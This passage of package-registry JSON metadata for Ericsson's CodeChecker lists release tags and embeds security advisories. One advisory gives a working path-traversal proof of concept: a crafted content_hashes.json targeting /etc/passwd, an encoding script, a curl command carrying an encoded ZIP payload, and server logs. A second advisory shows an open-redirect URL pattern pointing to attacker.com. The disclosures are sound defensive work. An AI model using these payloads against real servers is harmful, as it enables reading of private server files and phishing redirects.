arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1/manifests"},{"name":"v5.0","sha":"5bb577a9c03bbe78317a4a57d20c0c1e3a3064d0","kind":"commit","published_at":"2015-11-11T10:02:45.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.0/manifests"},{"name":"v4.0","sha":"72075b4a94b791cee9f434ea5d06c702e2fce16d","kind":"commit","published_at":"2015-08-26T13:33:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v4.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v4.0/manifests"}]},"repo_metadata_updated_at":"2025-08-19T18:14:34.537Z","dependent_packages_count":0,"downloads":25593,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":2.478371753854142,"dependent_repos_count":21.619800316896704,"dependent_packages_count":10.082087700208083,"stargazers_count":1.5815535685651674,"forks_count":2.888793017875278,"docker_downloads_count":2.7904828081213777,"average":6.906848194253459},"purl":"pkg:pypi/codechecker","advisories":[{"uuid":"GSA_kwCzR0hTQS1oMjZ3LXI0bTUtOHJyZs4AA9UE","url":"https://github.com/advisories/GHSA-h26w-r4m5-8rrf","title":"CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`","description":"## Summary\n\nZIP files uploaded to the server-side endpoint handling a `CodeChecker store` are not properly sanitized. An attacker can exercise a path traversal to make the `CodeChecker server` load and display files from an arbitrary location on the server machine.\n\n## Details\n\n### Target\n\nThe vulnerable endpoint is `/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService@massStoreRun`.\n\n### Exploit overview\n\nThe attack is made possible by improper sanitization at one point in the process.\n\n1. When the ZIP file is uploaded by `CodeChecker store`, it is first unzipped to a temporary directory (safely).\n2. When deciding which files to insert into CodeChecker's internal database, the decision is made based on the `content_hashes.json` in the ZIP. An attacker has control over the contents of this file.\n3. After reading that file, the paths specified in the JSON are normalized by this code:\nhttps://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444\n4. Providing sufficiently many `../../`s inside the `content_hashes.json`, an attacker can control the insertion of completely arbitrary files into CodeChecker's internal database.\n5. This is confirmed in the log output:\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n```\n6. Once the file is inserted into the internal database, it can be displayed trivially on the Web interface.\nAs CodeChecker doesn't distinguish between filenames after the ZIP is extraced, an attacker can define aliases in `content_hashes.json`.\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\nmass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n```\n7. The file is displayed in the Web UI if and only if there is at least one _bug report_ in it.\nThe bug reports are coming from the ZIP and the attacker can craft the required contents for this.\nIf done so, the logs confirm the requirement for presenting the results of the exploit will be triggered:\n```\nhash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n```\n8. The server emits the contents of the injected files from the server's database to all users:\n![CodeChecker's Web UI showing the snapshot of the /etc/passwd file that was injected to the database due to the path traversal attack.](https://user-images.githubusercontent.com/16914176/278057281-2c6994ed-4c24-4026-a6b6-148ac43243ca.png)\n\n\u003e [!NOTE]  \n\u003e The file is shown with the contents as it was on the system when the exploited `CodeChecker store` was exercised. This attack does not allow the server to return the \"live\" contents of a file on the server's storage \u0026mdash; the attacker(s) must recurringly exercise the exploit to keep the injected files \"updated\" in the database.\n\n\n## PoC\n\nThe minimal example that can trigger the exploit can be downloaded: [`PoC.zip`](https://github.com/Ericsson/codechecker/files/14757143/PoC.zip).\n\nThe key to the exploit is the `content_hashes.json` file. The additional files create a report in the loaded `/etc/passwd` file, so it is displayed in the web UI.\n\n\u003cdetails\u003e\u003csummary\u003e\u003ctt\u003e/content_hashes.json\u003c/tt\u003e\u003c/summary\u003e\n\n```json\n{\"/../../../../../../../../../../../../../../../etc/passwd\": \"malformed_hash\", \"/etc/passwd\": \"malformed_hash\"}\n```\n\u003c/details\u003e\n\n#### Uploading the ZIP to the server\n\nThe communication between the `CodeChecker store` and the server is done by transmitting the ZIP file in a Base64-encoded string.  \nEncoding the ZIP into the format of the API can be done with Python:\n\n```py\nimport base64\nimport zlib\n\nwith open(\"PoC.zip\", \"rb\") as f:\n    contents = f.read()\nencoded = base64.b64encode(zlib.compress(contents))\nprint(encoded)\n```\n\nThe result of the compression and encoding can be sent to the running server over the API.\nWhen the API is called, the exploit is exercised.\n\n```bash\ncurl \"\u003cSERVER_URL\u003e/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService\" \\\n    --data \\\n    '[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\":{\"str\":\"\u003cENCODED_ZIP\u003e\"},\"5\":{\"tf\":0}}]'\n```\n\n\u003cdetails\u003e\u003csummary\u003eOne-line PoC\u003c/summary\u003e\n\n```bash\ncurl \"http://localhost:8001/Default/v6.53/CodeCheckerService\" \\\n    --data \\\n    '[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\" {\"str\":\"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc=\"},\"5\":{\"tf\":0}}]' \n```\n\u003c/details\u003e\n\n\u003cdetails\u003e\u003csummary\u003eFull server logs for the \u003ctt\u003estore\u003c/tt\u003e processing\u003c/summary\u003e\n\n```\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Unzip storage file...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP '/tmp/tmpenegwbxj.zip' to '/home/discookie/.codechecker/tmpx7hg1teb'...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1298 store() - Using unzipped folder '/home/discookie/.codechecker/tmpx7hg1teb'\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store source files...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s).\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:463 __store_source_files() - 17 fileid found\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1363 store() - Storing into run 'poc' locked at '2023-10-25 14:30:31.615536'.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:686 __add_or_update_run() - Adding run 'poc'...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:730 __add_or_update_run() - Adding run history.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:755 __add_or_update_run() - Adding run done.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store reports...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports' directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43' directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1175 __store_reports() - Parsing input file 'sample.plist'\n[DEBUG][2023-10-25 14:30:31] {report-converter} [2043] \u003c139754026274816\u003e - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:987 __process_report_file() - Storing report to the database...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:827 __add_report_context() - Storing bug path positions.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:834 __add_report_context() - Storing bug path events.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:842 __add_report_context() - Storing notes.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:853 __add_report_context() - Storing macro expansions.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s).\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1260 finish_checker_run() - Finishing checker run\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1397 store() - 'Anonymous' stored results (3 KB /decompressed/) to run 'poc' (id: 16)  in 0.15 seconds.\n[INFO][2023-10-25 14:30:31] {store_time} [2043] \u003c139754026274816\u003e - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, \"Default\", \"poc\", 3KB, 1, 16\n[DEBUG][2023-10-25 14:30:31] {profiler} [2043] \u003c139754026274816\u003e - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun\n```\n\u003c/details\u003e\n\n## Impact\nThe path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server` process. This allows for the exfiltration from the server-side storage medium.\nIf the `CodeChecker server` is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the `CodeChecker server`, with the permission to store to a database, and view the stored reports.\n\nCVSS 3.1 Base Score: 6.5\n[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\u0026version=3.1)\n\nReproducible up to version `6.22.1`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-06-24T16:18:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf","https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a","https://nvd.nist.gov/vuln/detail/CVE-2023-49793","https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-54.yaml","https://github.com/advisories/GHSA-h26w-r4m5-8rrf"],"source_kind":"github","identifiers":["GHSA-h26w-r4m5-8rrf","CVE-2023-49793"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.23.0","vulnerable_version_range":"\u003c 6.23.0"}],"ecosystem":"pypi","package_name":"codechecker"}],"created_at":"2024-06-24T17:05:48.174Z","updated_at":"2025-08-06T03:14:32.316Z","epss_percentage":0.00778,"epss_percentile":0.72694},{"uuid":"GSA_kwCzR0hTQS1nODM5LXgzcDMtZzVmbc4ABFBH","url":"https://github.com/advisories/GHSA-g839-x3p3-g5fm","title":"CodeChecker open redirect when URL contains multiple slashes after the product name","description":"Summary\n---\n\nCodeChecker versions up to 6.24.5 contain an open redirect vulnerability due to missing protections against multiple slashes after the product name in the URL's path segment.  This results in bypassing protections against CVE-2021-28861, leading to the same open redirect pathway.\n\nDetails\n---\n\nCodeChecker processes GET requests by first rewriting the path segment of the URL, and then passing the rewritten URL to the webserver framework.\nWhen trimming the product name from the URL, no sanitization was performed on the remaining URL, which reintroduced the same issue as CVE-2021-28861, leading to the same open redirect pathway using URLs such as `/Default//attacker.com/%2f..`.\n\nImpact\n---\n\nThe vulnerability allows an attacker to create a hyperlink that looks like a legitimate CodeChecker URL, but redirects to an attacker-supplied website when clicked.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-03-03T19:53:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":0.0,"cvss_vector":null,"references":["https://github.com/Ericsson/codechecker/security/advisories/GHSA-g839-x3p3-g5fm","https://nvd.nist.gov/vuln/detail/CVE-2025-1300","https://github.com/advisories/GHSA-g839-x3p3-g5fm"],"source_kind":"github","identifiers":["GHSA-g839-x3p3-g5fm","CVE-2025-1300"],"repository_url":"https://github.com/Ericsson/codechecker","blast_radius":0.0,"packages":[{"versions":[{"first_patched_version":"6.24.6","vulnerable_version_range":"\u003c= 